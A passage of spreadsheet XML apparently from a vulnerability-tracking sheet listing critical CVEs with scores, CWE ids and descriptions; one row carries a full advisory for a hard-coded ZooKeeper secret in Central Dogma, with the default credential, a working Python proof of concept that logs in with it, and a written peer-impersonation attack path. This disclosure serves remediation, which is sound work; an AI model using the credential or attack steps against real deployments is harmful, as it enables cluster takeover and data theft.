          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11746</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>maven:com.linecorp.centraldogma:centraldogma-server</t>
        </is>
      </c>
      <c r="M98" s="5" t="inlineStr">
        <is>
          <t>0.84.0</t>
        </is>
      </c>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr"/>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
`ZooKeeperReplicationConfig.secret()` silently substitutes the hard-coded constant `"ch4n63m3"` (leetspeak for "change me") whenever the operator omits `replication.secret`. The same secret is wired into both the **client-facing SASL context** and the **quorum/learner SASL contexts** of the embedded ZooKeeper. The constant is in OSS source on GitHub and is discoverable via code search in seconds.
### Three Reinforcing Defects
1. **OSS-public credential** — `DEFAULT_SECRET` is in `line/centraldogma` source.
2. **Silent fallback** — `firstNonNull(convertValue(...), DEFAULT_SECRET)` substitutes the default with no log, no warning, no startup banner. The only sanity check `checkArgument(!secret().isEmpty(), ...)` passes because the getter substitutes the literal before the emptiness check runs.
3. **Dual-purpose secret** — used for both ZK client-port super auth and inter-peer quorum SASL. A single leaked password authenticates against both surfaces.
### Architecture Context (Important)
Central Dogma does **NOT** connect to an external ZooKeeper ensemble. Each replica embeds a `QuorumPeer` (`EmbeddedZooKeeper extends QuorumPeer`) inside its own JVM. The Central Dogma cluster **IS** the ZK ensemble. So the "ZK network" is the inter-replica network of the Central Dogma cluster itself.
### Applicability
| `replication.method` | ZK Started? | Applicable? |
|---|---|---|
| `NONE` (standalone, dev default) | No | **NOT applicable** |
| `ZOOKEEPER` (HA production) | Yes, embedded on every replica | **Fully applicable** — canonical production configuration |
---
## Evidence
**File:** `server/src/main/java/com/linecorp/centraldogma/server/ZooKeeperReplicationConfig.java`
**Branch:** `main` @ commit `d64a5151`
**Line 53** — the constant:
```java
private static final String DEFAULT_SECRET = "ch4n63m3";
```
**Lines 210–215** — the silent fallback:
```java
/**
 * Returns the secret string used for authenticating the ZooKeeper peers.
 */
public String secret() {
    return firstNonNull(convertValue(secret, "replication.secret"), DEFAULT_SECRET);
}
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/ZooKeeperCommandExecutor.java`
**Lines 586–607** — JAAS wiring (same secret on both surfaces):
```java
final String escapedSecret = jaasValueEscaper.escape(cfg.secret());
ImmutableList.of("Server", EmbeddedZooKeeper.SASL_SERVER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("user_super=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
ImmutableList.of("Client", EmbeddedZooKeeper.SASL_LEARNER_LOGIN_CONTEXT).forEach(name -&gt; {
    buf.append(name).append(" {").append(newline);
    buf.append(DigestLoginModule.class.getName()).append(" required").append(newline);
    buf.append("username=\"super\"").append(newline);
    buf.append("password=\"").append(escapedSecret).append("\";").append(newline);
    buf.append("};").append(newline);
});
```
---
**File:** `server/src/main/java/com/linecorp/centraldogma/server/internal/replication/EmbeddedZooKeeper.java`
**Line 44** — proves CD embeds the ZK server:
```java
final class EmbeddedZooKeeper extends QuorumPeer {
```
**Lines 213–220** — client port binding (loopback only):
```java
private static ServerCnxnFactory createCnxnFactory(QuorumPeerConfig zkCfg) throws IOException {
    final InetSocketAddress bindAddr = zkCfg.getClientPortAddress();
    final ServerCnxnFactory cnxnFactory = ServerCnxnFactory.createFactory();
    // Listen only on 127.0.0.1 because we do not want to expose ZooKeeper to others.
    cnxnFactory.configure(new InetSocketAddress("127.0.0.1", bindAddr != null ? bindAddr.getPort() : 0),
                          zkCfg.getMaxClientCnxns());
    return cnxnFactory;
}
```
&gt; Quorum/election ports are **NOT** loopback-bound — they bind to `replication.servers[].host` as configured, exposed on the inter-replica network.
---
## PoC
Two attack surfaces, two scenarios. **Surface A** (client port, same-host) is implemented as a working read-only PoC. **Surface B** (quorum-port peer impersonation) is documented but intentionally not weaponized.
### Surface A — Same-Host Client Port (Loopback) PoC
Python + kazoo + pure-sasl. Authenticates as `super` over SASL DIGEST-MD5 with the leaked secret and reads the full Central Dogma replication log. Hardcoded to `127.0.0.1`, read-only, prints first 5 entries.
```python
#!/usr/bin/env python3
"""
C3 PoC -- ZooKeeper default-secret takeover (read-only, loopback only).
Demonstrates that a Central Dogma instance launched with a
ZooKeeper-replicated configuration but without `replication.secret` set
exposes its embedded ZooKeeper to anyone with local-host access, using
the well-known credential `super / ch4n63m3`.
SAFETY:
  * Hardcoded to 127.0.0.1. Refuses any other target.
  * Read-only. No writes are issued. No nodes are deleted.
  * Limits how much data it prints (first MAX_LOGS entries).
"""
from __future__ import annotations
import sys
from kazoo.client import KazooClient
from kazoo.exceptions import NoNodeError
HOST = "127.0.0.1"
DEFAULT_PORT = 2381
DEFAULT_USER = "super"
DEFAULT_SECRET = "ch4n63m3"  # ZooKeeperReplicationConfig.DEFAULT_SECRET
MAX_LOGS = 5
def main() -&gt; int:
    port = int(sys.argv[1]) if len(sys.argv) &gt; 1 else DEFAULT_PORT
    if HOST != "127.0.0.1":
        print("Refusing to run against non-loopback host.", file=sys.stderr)
        return 2
    zk = KazooClient(
        hosts=f"{HOST}:{port}",
        sasl_options={
            "mechanism": "DIGEST-MD5",
            "username": DEFAULT_USER,
            "password": DEFAULT_SECRET,
        },
        read_only=True,
        timeout=5.0,
    )
    try:
        zk.start(timeout=5)
    except Exception as exc:
        print(f"[!] Could not reach {HOST}:{port} -- {exc}", file=sys.stderr)
        return 1
    try:
        try:
            log_children = zk.get_children("/dogma/logs")
        except NoNodeError:
            print("[i] /dogma/logs not present -- is replication actually enabled?")
            log_children = []
        print(f"[+] Authenticated as '{DEFAULT_USER}' with default secret.")
        print(f"[+] /dogma/logs has {len(log_children)} entries.")
        for child in sorted(log_children)[:MAX_LOGS]:
            path = f"/dogma/logs/{child}"
            try:
                data, stat = zk.get(path)
            except NoNodeError:
                continue
            preview = data[:120].decode("utf-8", errors="replace") if data else ""
            print(f"  - {path}  ({stat.dataLength} bytes)  preview={preview!r}")
        try:
            block_children = zk.get_children("/dogma/log_blocks")
            print(f"[+] /dogma/log_blocks has {len(block_children)} entries.")
        except NoNodeError:
            pass
        print(
            f"[!] ZK cluster compromised: read {len(log_children)} log entries "
            "with default credentials."
        )
        return 0
    finally:
        zk.stop()
        zk.close()
if __name__ == "__main__":
    raise SystemExit(main())
```
**Dependencies** (`requirements.txt`): `kazoo`, `pure-sasl`
**Setup:** edit `dist/src/conf/dogma.json` to enable replication **WITHOUT** setting secret:
```json
{
  "replication": {
    "method": "ZOOKEEPER",
    "serverId": 1,
    "servers": {
      "1": { "host": "127.0.0.1", "quorumPort": 2382, "electionPort": 2383, "clientPort": 2381 }
    }
  }
}
```
&gt; **Note:** `replication.secret` is **INTENTIONALLY** omitted. Launch with `./gradlew :dist:startup`.
**Run:**
```bash
python3 zk_takeover.py 2381
```
**Expected output (VULNERABLE):**
```
[+] Authenticated as 'super' with default secret.
[+] /dogma/logs has 14 entries.
  - /dogma/logs/0000000001  (412 bytes)  preview="{"size":..."
  - /dogma/logs/0000000002  (508 bytes)  preview="{"size":..."
  ...
[+] /dogma/log_blocks has 14 entries.
[!] ZK cluster compromised: read 14 log entries with default credentials.
```
After the patch (fail-closed on null/placeholder secret), Central Dogma **refuses to start at all** with this config.
### Surface B — Inter-Replica Quorum-Port Peer Impersonation (Documented, Not Weaponized)
Quorum/election ports bind to the configured `replication.servers[].host`, **NOT** to loopback. In typical HA deployments (multi-DC, K8s with NetworkPolicy gaps, shared VPC), these ports are reachable from peer workloads.
**Attack path:**
1. Attacker reaches the quorum port of any Central Dogma replica from a co-located workload (same K8s namespace, same VLAN, etc.).
2. Attacker spins up their own Apache ZooKeeper process configured with:
   - matching `serverId` (or a new one if the `QuorumVerifier` allows dynamic membership)
   - JAAS `QuorumLearner` / `QuorumServer` digest contexts using `super / ch4n63m3`
   - `quorumServerSaslAuthRequired=true`, `quorumLearnerSaslAuthRequired=true`
3. Attacker's process joins the quorum as a learner. SASL handshake passes because the secret matches.
4. Attacker now receives every replicated `Command`, can attempt to win leader election, and once in the cluster can write to `/dogma/logs/` directly — which `ZooKeeperCommandExecutor.replayLogs()` will deserialize and execute on every legitimate replica.
**Dangerous Commands the attacker can replay across the cluster** (from `Command.java:46-68`):
| Command | Impact |
|---|---|
| `PURGE_PROJECT` | Permanent deletion |
| `ROTATE_SESSION_MASTER_KEY` / `REWRAP_ALL_KEYS` | Pivot encryption-at-rest layer to attacker-controlled keys |
| `UPDATE_SERVER_STATUS` (read-only / maintenance) | Denial of Service |
| `CREATE_SESSION` with crafted user info | Session forgery |
&gt; This PoC is **intentionally NOT shipped as runnable code**. It is closer to an attack tool than a verification artifact, and the audit's purpose is to drive the fix, not to provide weaponization. The Surface A PoC plus this documentation are sufficient to motivate remediation.
---
## Impact
### Threat Model (Realistic for LINE Corporate Deployment)
- Multi-tenant K8s where Central Dogma StatefulSet shares Pod network with other workloads
- Or shared VPC/VLAN where the inter-replica quorum traffic is reachable from co-tenant hosts
- Or single-tenant cluster where any sidecar/co-located process has loopback access (Surface A)
### What an Attacker Gains with the Leaked Secret
1. **Read the full replication log.** `/dogma/logs` + `/dogma/log_blocks` contain the Zstd-compressed `ReplicationLog` entries — every commit, every `PUSH` payload (with file contents), every credential mutation, every session/master-key management command. Includes `CREATE_SESSION_MASTER_KEY`, `ROTATE_SESSION_MASTER_KEY`, `REWRAP_ALL_KEYS`. Reading this effectively renders the encryption-at-rest layer moot because the master-key management commands themselves traverse ZK.
2. **Write to the replication log (Surface B).** Forged `LogMeta` + `log_blocks` entries are auto-replayed by `ZooKeeperCommandExecutor.replayLogs()` on every replica. The attacker gains **arbitrary Command execution on the entire cluster**.
3. **Join the quorum as a fake peer (Surface B).** With the secret, an attacker reachable on the inter-replica network can pose as a legitimate replica, receive all future commits in real time, and potentially win leadership.
**Scope is Changed** (CVSS) because ZK is a separate security authority from Central Dogma's HTTP API, and the impact propagates to every microservice consuming Central Dogma configuration via watch.
**Incident recovery cost:** secret rotation alone is insufficient. Every `Command` that traversed ZK during the compromise window must be audited. If master-key rotation commands were issued, all encryption-at-rest data must be re-encrypted. This is an **extremely high-blast-radius failure mode** for a single missing config knob.
**Historical analogue:** this is the same anti-pattern that caused Mirai (2016, IoT default credentials), pre-2018 unauthenticated Hadoop YARN clusters, and the recurring ZK / Elasticsearch / MongoDB internet-exposed-without-auth incidents 2018–2024.
---
## How to Fix
**Remove the default constant. Fail closed when `replication.secret` is missing or matches the legacy placeholder.**
```java
// ZooKeeperReplicationConfig.java
// REMOVE: private static final String DEFAULT_SECRET = "ch4n63m3";
@JsonCreator
ZooKeeperReplicationConfig(/* ...unchanged params... */
                           @JsonProperty("secret") @Nullable String secret,
                           /* ... */) {
    // ...
    final String resolved = convertValue(secret, "replication.secret");
    checkArgument(resolved != null &amp;&amp; !resolved.isEmpty(),
                  "'replication.secret' must be set (and non-empty) when " +
                  "ZooKeeper replication is enabled. There is no default; " +
                  "generate a long random string and configure it on every " +
                  "replica.");
    // Reject the historical placeholder explicitly so existing config files
    // copy-pasted from old tutorials fail loudly instead of silently.
    checkArgument(!"ch4n63m3".equals(resolved),
                  "'replication.secret' is set to the legacy placeholder " +
                  "value. Replace it with a fresh random secret " +
                  "(`openssl rand -hex 32`).");
    // Optional: enforce minimum length (32 chars) and reject obvious placeholders.
    checkArgument(resolved.length() &gt;= 32,
                  "'replication.secret' must be at least 32 characters. " +
                  "Use `openssl rand -hex 32` to generate one.");
    this.secret = resolved;
}
public String secret() {
    return secret;  // never null at this point
}
```</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11746</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38056</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the iDirect iQ200 VSAT terminal running firmware 23.0.1.0. The iQ200 is a rackmount satellite modem deployed across oil and gas, maritime, defense, and remote infrastructure as the primary, and often sole communications link for offshore rigs, vessels, and remote sites. Important context: the device ships from the factory with a pre-configured low-privilege local user account. This account is intended for field technicians who need shell access for maintenance and diagnostics but should not have full administrative control over the device. This built-in account provides the initial access required to exploit this vulnerability. No additional credentials need to be obtained or brute-forced.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38056</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61410</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Missing Authorization vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution. This vulnerability is considered critical because it allows an attacker to execute commands remotely on a target system by sending a specially crafted request to the application, bypassing intended restrictions on code execution.Dell recommends customers to upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61410</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82466</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.46.0 contains an authentication bypass vulnerability in the webauthn_login route that allows logged-in users to authenticate as any other account. Attackers can exploit improper account resolution logic that falls back to session account identifiers instead of validating the credential binding to complete authentication as arbitrary users.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82466</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86151</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Tenda CP3 27.5.57.101. The affected element is the function sub_2F77E8 of the file Apis/system.c of the component Network Configuration Management. Performing a manipulation results in os command injection. The attack may be initiated remotely.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86151</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54072</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>Authorizer is an open-source, self-hostable authentication and authorization server. Prior to version 2.2.1, the `/authorize` endpoint accepts any `redirect_uri` without validating it against `AllowedOrigins`. When `response_type=token` or `response_type=id_token`, the server appends `access_token`, `id_token`, and `refresh_token` as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required `client_id` from the public `/graphql?query={meta{client_id}}` endpoint. A partial fix was applied in v2.0.1 to other handlers (`oauth_login`, `verify_email`, `magic_link_login`, `forgot_password`, `invite_members`, `oauth_callback`) but `/authorize` was not included. Version 2.2.1 contains a more complete fix.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54072</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72709</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>SPIP before version 4.4.18 contains a missing authorization vulnerability in sensitive actions under ecrire/action/ that allows unauthenticated attackers to invoke privileged actions by supplying only a valid CSRF nonce without any server-side permission check. Attackers can bypass template-level authorization guards through direct HTTP requests to invoke actions such as editer_auteur, enabling arbitrary account password rewrites including administrator accounts and resulting in full account takeover.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72709</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72710</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains a mass assignment vulnerability in the editer_objet action that allows unauthenticated attackers to write arbitrary rows to any SQL table lacking a champs_editables allowlist by supplying an attacker-controlled arg parameter resolving to internal database tables. Attackers can insert a malicious row into the spip_jobs queue with a controlled PHP function and arguments, which is then dynamically executed when the cron processes the queue, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72710</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80238</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. This vulnerability is considered critical because a low-privileged operator with SSH access to the SCG host can gain root-level access to the host without requiring a password by leveraging the exposed Docker socket. Additionally, an attacker who compromises a service running within the orchestrator container can access the same socket and escape the container boundary to obtain host-level control. Dell recommends that customers upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80238</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87984</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
